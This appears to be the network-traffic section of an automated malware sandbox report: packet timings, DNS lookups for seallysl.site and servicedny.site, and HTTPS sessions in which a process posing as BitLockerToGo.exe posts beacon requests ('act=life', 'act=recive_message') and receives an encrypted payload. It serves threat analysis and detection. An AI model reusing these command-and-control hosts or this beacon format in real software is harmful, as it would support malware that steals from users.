Oct 29, 2024 18:39:34.872539997 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:34.921607018 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.088762045 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.088949919 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.089004040 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.089029074 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.089108944 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.089150906 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.089158058 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.089360952 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.089411974 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.094329119 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.094340086 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.094352007 CET	49834	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.094356060 CET	443	49834	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.296089888 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.296128988 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.296205044 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.296554089 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.296569109 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.901034117 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.901236057 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.903048038 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.903059959 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.903399944 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:35.905250072 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.905421019 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:35.905458927 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:37.390311003 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:37.390448093 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:37.390652895 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:37.390866041 CET	49841	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:37.390889883 CET	443	49841	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:37.536009073 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:37.536047935 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:37.536170006 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:37.536474943 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:37.536488056 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.145356894 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.145428896 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.147036076 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.147047043 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.147304058 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.148792028 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.148967028 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.149004936 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.149089098 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.149096012 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.731520891 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.731618881 CET	443	49851	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.731964111 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.731986046 CET	49851	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.934797049 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.934859037 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:38.934956074 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.935368061 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:38.935396910 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:39.556533098 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:39.556612015 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:39.557719946 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:39.557728052 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:39.557964087 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:39.559515953 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:39.559684038 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:39.559724092 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:39.559787989 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:39.559797049 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:40.391371012 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:40.391458988 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:40.391622066 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:40.391649961 CET	49862	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:40.391663074 CET	443	49862	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:40.647994041 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:40.648041964 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:40.648226023 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:40.648714066 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:40.648729086 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:41.296441078 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:41.296508074 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:41.297631979 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:41.297638893 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:41.297873974 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:41.299061060 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:41.299160004 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:41.299165010 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:41.944602013 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:41.944715023 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:41.944765091 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:41.944864988 CET	49873	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:41.944881916 CET	443	49873	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:42.432924032 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:42.432970047 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:42.433039904 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:42.433350086 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:42.433361053 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.119554996 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.119673014 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.120815039 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.120820045 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.121038914 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.122252941 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123049021 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123071909 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.123153925 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123177052 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.123272896 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123332024 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.123445034 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123457909 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.123580933 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123604059 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.123737097 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123760939 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.123768091 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123801947 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.123895884 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.123933077 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.135067940 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.135232925 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.135247946 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.135265112 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.135277987 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.135294914 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:44.135379076 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.135411978 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.135426998 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:44.140470028 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.080411911 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.080513954 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.080565929 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.080671072 CET	49884	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.080682993 CET	443	49884	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.106592894 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.106622934 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.106693029 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.107022047 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.107033968 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.765863895 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.765923977 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.767179966 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.767189026 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.767405987 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:46.768867970 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.768891096 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:46.768913031 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:47.096075058 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:47.096182108 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:47.096239090 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:47.124176025 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:47.124176025 CET	49905	443	192.168.2.6	172.67.180.76
Oct 29, 2024 18:39:47.124205112 CET	443	49905	172.67.180.76	192.168.2.6
Oct 29, 2024 18:39:47.124217033 CET	443	49905	172.67.180.76	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 18:39:32.417886972 CET	52252	53	192.168.2.6	1.1.1.1
Oct 29, 2024 18:39:32.429128885 CET	53	52252	1.1.1.1	192.168.2.6
Oct 29, 2024 18:39:32.467113018 CET	53467	53	192.168.2.6	1.1.1.1
Oct 29, 2024 18:39:32.478683949 CET	53	53467	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 29, 2024 18:39:32.417886972 CET	192.168.2.6	1.1.1.1	0xe1e5	Standard query (0)	servicedny.site	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:39:32.467113018 CET	192.168.2.6	1.1.1.1	0x5b81	Standard query (0)	seallysl.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 18:39:32.429128885 CET	1.1.1.1	192.168.2.6	0xe1e5	Name error (3)	servicedny.site	none	none	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:39:32.478683949 CET	1.1.1.1	192.168.2.6	0x5b81	No error (0)	seallysl.site		172.67.180.76	A (IP address)	IN (0x0001)	false
Oct 29, 2024 18:39:32.478683949 CET	1.1.1.1	192.168.2.6	0x5b81	No error (0)	seallysl.site		104.21.43.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

seallysl.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49824	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:33 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: seallysl.site
2024-10-29 17:39:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-29 17:39:33 UTC	1002	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=56vfiigdmgl1q215dm48vei3vo; expires=Sat, 22 Feb 2025 11:26:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mo2q4w7R80RsnoXRrzdQM%2BuRFivmMgsThkFFhk8VrG2WNADIks7USJSCek4HiYy0JmcvIMjicXpH%2F4Hom9O5hh%2FWrXUJlEjRIj97IPLvXclfdH434NMRFcdIV8Ibd8C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f2157ad9bd5e-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19903&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=145199&cwnd=32&unsent_bytes=0&cid=1cacd8004a86663d&ts=446&x=0"
2024-10-29 17:39:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-29 17:39:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49834	172.67.180.76	443	3060	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:39:34 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: seallysl.site
2024-10-29 17:39:34 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 6b 66 53 35 66 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=MkfS5f--&j=
2024-10-29 17:39:34 UTC	998	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 17:39:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fka18lfofs2fahg3u5tknh9gut; expires=Sat, 22 Feb 2025 11:26:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2Fim56hcj81hivKYpzvPBPlte1SZPHEkWnTeIIqHICA2QMHS5LgcnHE7NgpM73mTAKQ0QdjD7c9E0XP6ByZfWoB99mVqioC2SNsIPUQiZ1GHf0C0JwbiI1BfjEBaCXtv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4f21c1cb0b04d-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19971&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=939&delivery_rate=146033&cwnd=32&unsent_bytes=0&cid=e2850615c3bc9dfd&ts=490&x=0"
2024-10-29 17:39:34 UTC	371	IN	Data Raw: 34 34 36 63 0d 0a 62 48 77 68 30 6a 63 6c 47 66 32 5a 50 53 6c 76 75 4d 72 4b 6e 43 45 45 4d 66 2f 56 51 55 33 78 37 78 54 45 56 4f 56 32 4c 73 4d 58 58 6c 66 77 44 52 45 31 33 2b 70 59 43 31 58 4d 75 4c 2f 35 44 53 5a 51 6d 2f 64 37 4b 35 43 44 5a 36 46 34 78 77 42 44 34 56 59 61 51 4c 35 45 51 44 58 66 2f 45 55 4c 56 65 4f 78 36 50 6c 50 4a 67 76 64 73 43 73 76 6b 49 4e 32 70 54 2b 4b 42 6b 4b 67 42 42 42 47 75 6c 4a 47 66 5a 7a 31 55 45 77 4b 33 61 75 67 38 6b 68 70 57 5a 4c 33 62 57 2b 55 6c 54 62 2b 64 71 67 54 57 71 49 68 48 56 4b 35 46 56 67 31 68 72 74 59 52 30 32 43 36 4b 76 35 51 32 68 58 6d 37 34 70 4a 5a 6d 4c 64 36 41 2b 6c 52 39 49 71 77 51 65 52 62 74 59 54 32 6d 52 2f 31 64 48 44 4e 65 72 36 4c 41 44 59 55 76 64 37 32 4e 38 6f 59 35 6e 74 Data Ascii: 446cbHwh0jclGf2ZPSlvuMrKnCEEMf/VQU3x7xTEVOV2LsMXXlfwDRE13+pYC1XMuL/5DSZQm/d7K5CDZ6F4xwBD4VYaQL5EQDXf/EULVeOx6PlPJgvdsCsvkIN2pT+KBkKgBBBGulJGfZz1UEwK3aug8khpWZL3bW+UlTb+dqgTWqIhHVK5FVg1hrtYR02C6Kv5Q2hXm74pJZmLd6A+lR9IqwQeRbtYT2mR/1dHDNer6LADYUvd72N8oY5nt
2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 6c 36 58 75 43 41 76 6c 49 64 38 71 54 79 44 47 55 47 6e 44 68 34 44 2f 68 56 41 59 39 2b 6a 48 32 67 49 79 71 2b 6b 36 41 46 63 45 34 4c 35 4f 6d 2b 55 67 54 62 2b 64 6f 38 52 54 36 49 46 45 55 43 34 58 6c 56 37 6a 66 31 53 54 68 2f 63 72 61 62 30 51 48 52 5a 6b 37 45 67 4a 70 69 45 63 36 45 79 78 31 6f 4d 70 68 5a 65 47 2f 42 30 53 6e 43 54 38 55 68 4c 54 63 58 6d 73 62 35 45 61 68 50 46 39 79 63 75 6c 34 78 79 71 44 69 44 47 45 71 76 41 78 46 46 75 6c 56 41 63 5a 66 7a 58 6b 59 47 31 61 69 74 38 30 64 67 58 35 79 79 59 32 48 54 69 6d 37 6d 62 73 63 36 53 36 49 63 58 48 61 7a 57 30 6c 38 69 62 74 41 42 52 53 61 72 36 53 2b 47 79 5a 64 6d 4c 67 78 4c 6f 47 49 65 4c 51 36 67 68 4a 42 6f 67 41 65 52 72 64 59 53 58 32 59 2b 46 64 50 44 4e 53 6b 6f 76 31 48 Data Ascii: l6XuCAvlId8qTyDGUGnDh4D/hVAY9+jH2gIyq+k6AFcE4L5Om+UgTb+do8RT6IFEUC4XlV7jf1STh/crab0QHRZk7EgJpiEc6Eyx1oMphZeG/B0SnCT8UhLTcXmsb5EahPF9ycul4xyqDiDGEqvAxFFulVAcZfzXkYG1ait80dgX5yyY2HTim7mbsc6S6IcXHazW0l8ibtABRSar6S+GyZdmLgxLoGIeLQ6ghJBogAeRrdYSX2Y+FdPDNSkov1H
2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 63 6f 4a 5a 65 4e 63 61 73 7a 68 42 4e 50 72 41 6b 55 54 62 64 52 53 33 4b 53 2f 56 39 4d 43 64 2b 36 72 66 64 50 61 68 50 54 39 79 51 33 30 39 55 32 69 54 47 52 46 32 4f 69 48 78 63 44 72 78 74 65 4f 35 6a 33 48 78 4e 4e 33 61 32 67 39 55 56 75 55 34 2b 79 4c 53 53 53 68 33 43 6e 4f 34 73 53 54 4b 41 4f 47 45 2b 77 55 6b 42 70 6a 66 35 5a 57 51 65 61 35 75 6a 35 57 79 59 4c 33 59 45 7a 4f 49 4b 62 4e 4a 4d 31 69 52 70 4c 74 30 34 42 44 61 6b 56 51 48 66 66 6f 78 39 41 44 64 61 76 6f 50 68 48 62 6c 79 53 76 6a 45 75 6e 34 4e 6b 6f 54 61 4f 47 6b 4f 74 42 78 4e 45 76 56 35 4e 64 70 76 38 58 67 74 44 6d 71 2b 77 76 68 73 6d 5a 59 32 36 4c 77 47 59 67 58 2f 6d 4b 63 6b 4e 44 4b 59 43 58 68 76 77 55 55 74 7a 6c 66 52 57 51 51 66 56 6f 61 6a 32 53 6d 39 51 6e Data Ascii: coJZeNcaszhBNPrAkUTbdRS3KS/V9MCd+6rfdPahPT9yQ309U2iTGRF2OiHxcDrxteO5j3HxNN3a2g9UVuU4+yLSSSh3CnO4sSTKAOGE+wUkBpjf5ZWQea5uj5WyYL3YEzOIKbNJM1iRpLt04BDakVQHffox9ADdavoPhHblySvjEun4NkoTaOGkOtBxNEvV5Ndpv8XgtDmq+wvhsmZY26LwGYgX/mKckNDKYCXhvwUUtzlfRWQQfVoaj2Sm9Qn
2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 4c 7a 56 6d 42 41 38 55 31 64 75 45 52 55 46 72 77 55 6b 73 37 78 37 74 54 53 41 48 53 70 36 37 33 54 32 78 61 6c 72 73 6f 4b 35 2b 45 63 36 41 33 67 68 46 4e 70 51 49 55 52 62 4e 57 53 48 53 51 38 78 38 46 54 64 32 77 36 4b 59 44 51 30 53 57 75 53 56 76 6a 4d 4e 76 35 6a 47 4c 56 42 54 68 41 68 64 46 74 6c 42 4c 65 70 6e 7a 57 6b 4d 4a 32 36 36 75 2f 55 78 69 56 70 79 34 4a 79 4f 64 68 33 65 6e 4f 6f 77 62 52 36 52 4f 55 41 4f 33 54 51 63 6a 33 38 70 63 58 52 72 4b 70 4f 6a 68 44 58 38 54 6d 72 74 6a 64 39 4f 4d 5a 4b 77 38 69 52 46 44 70 41 30 52 52 4c 31 54 53 33 47 57 38 31 6c 45 42 4d 69 72 70 50 42 45 61 46 2b 54 75 69 6b 73 6e 73 30 34 35 6a 47 66 56 42 54 68 49 68 6c 4f 6e 6c 35 4c 66 4e 2f 6b 45 56 4a 4e 33 61 54 6f 70 67 4e 71 57 5a 47 2b 49 79 Data Ascii: LzVmBA8U1duERUFrwUks7x7tTSAHSp673T2xalrsoK5+Ec6A3ghFNpQIURbNWSHSQ8x8FTd2w6KYDQ0SWuSVvjMNv5jGLVBThAhdFtlBLepnzWkMJ266u/UxiVpy4JyOdh3enOowbR6ROUAO3TQcj38pcXRrKpOjhDX8Tmrtjd9OMZKw8iRFDpA0RRL1TS3GW81lEBMirpPBEaF+Tuiksns045jGfVBThIhlOnl5LfN/kEVJN3aTopgNqWZG+Iy
2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 73 44 57 52 48 30 47 74 54 67 45 4e 71 52 56 41 64 39 2b 6a 48 30 30 43 30 36 75 6e 2f 30 70 71 58 70 69 2b 4a 69 36 56 69 58 79 73 4e 6f 45 53 54 61 51 45 48 55 4b 36 58 45 42 7a 6d 50 68 4e 43 30 4f 61 72 37 43 2b 47 79 5a 36 6d 71 55 74 50 39 4f 53 4f 4c 39 32 67 42 67 4d 2b 55 34 61 53 62 39 52 51 48 65 5a 2f 6c 6c 47 44 4e 57 70 71 50 46 48 62 56 71 62 74 69 34 71 6e 6f 6c 6b 72 44 32 49 47 45 57 74 41 31 34 4e 38 46 4a 66 4f 38 65 37 62 6b 59 44 31 4b 2b 2b 76 6c 77 6f 53 74 32 77 4c 32 2f 4c 7a 58 65 71 4f 59 51 62 54 36 49 50 46 46 47 69 57 55 35 7a 6d 76 64 55 52 51 76 49 72 71 66 33 51 47 56 61 6d 72 38 76 4a 5a 43 4b 4e 75 68 32 67 41 77 4d 2b 55 34 39 56 4b 42 59 42 32 54 52 34 68 39 4d 41 5a 72 77 36 50 5a 4f 62 6c 6d 5a 73 43 34 6f 6c 59 52 Data Ascii: sDWRH0GtTgENqRVAd9+jH00C06un/0pqXpi+Ji6ViXysNoESTaQEHUK6XEBzmPhNC0Oar7C+GyZ6mqUtP9OSOL92gBgM+U4aSb9RQHeZ/llGDNWpqPFHbVqbti4qnolkrD2IGEWtA14N8FJfO8e7bkYD1K++vlwoSt2wL2/LzXeqOYQbT6IPFFGiWU5zmvdURQvIrqf3QGVamr8vJZCKNuh2gAwM+U49VKBYB2TR4h9MAZrw6PZOblmZsC4olYR
2024-10-29 17:39:34 UTC	1369	IN	Data Raw: 78 4e 4a 6f 67 49 56 52 4c 4e 61 51 33 4b 52 38 6c 41 4c 51 35 71 76 73 4c 34 62 4a 6e 4b 47 74 43 38 69 30 35 49 34 76 33 61 41 47 41 7a 35 54 68 4a 4e 74 56 56 4e 66 5a 76 2b 57 55 45 49 32 71 4f 72 38 55 64 67 56 35 4b 33 4b 43 61 53 69 33 4f 73 50 59 45 5a 54 36 63 49 58 67 33 77 55 6c 38 37 78 37 74 2f 55 41 44 57 72 2b 6a 68 44 58 38 54 6d 72 74 6a 64 39 4f 47 65 71 49 78 68 78 6c 50 71 51 73 61 53 62 56 56 54 32 6d 58 2b 31 68 5a 48 39 71 68 72 66 4a 41 5a 6c 65 62 76 69 55 73 6c 38 30 34 35 6a 47 66 56 42 54 68 49 78 4a 45 6d 56 4a 63 4f 34 43 31 52 67 73 4b 31 75 6a 77 76 6b 4a 74 57 5a 4b 36 49 43 6d 51 68 6e 4f 73 4e 34 41 63 51 62 4d 4e 45 55 79 30 56 55 68 39 6d 66 70 51 54 51 72 54 71 61 44 35 41 79 67 54 6d 71 39 6a 64 39 4f 6a 63 61 55 79 Data Ascii: xNJogIVRLNaQ3KR8lALQ5qvsL4bJnKGtC8i05I4v3aAGAz5ThJNtVVNfZv+WUEI2qOr8UdgV5K3KCaSi3OsPYEZT6cIXg3wUl87x7t/UADWr+jhDX8Tmrtjd9OGeqIxhxlPqQsaSbVVT2mX+1hZH9qhrfJAZlebviUsl8045jGfVBThIxJEmVJcO4C1RgsK1ujwvkJtWZK6ICmQhnOsN4AcQbMNEUy0VUh9mfpQTQrTqaD5AygTmq9jd9OjcaUy
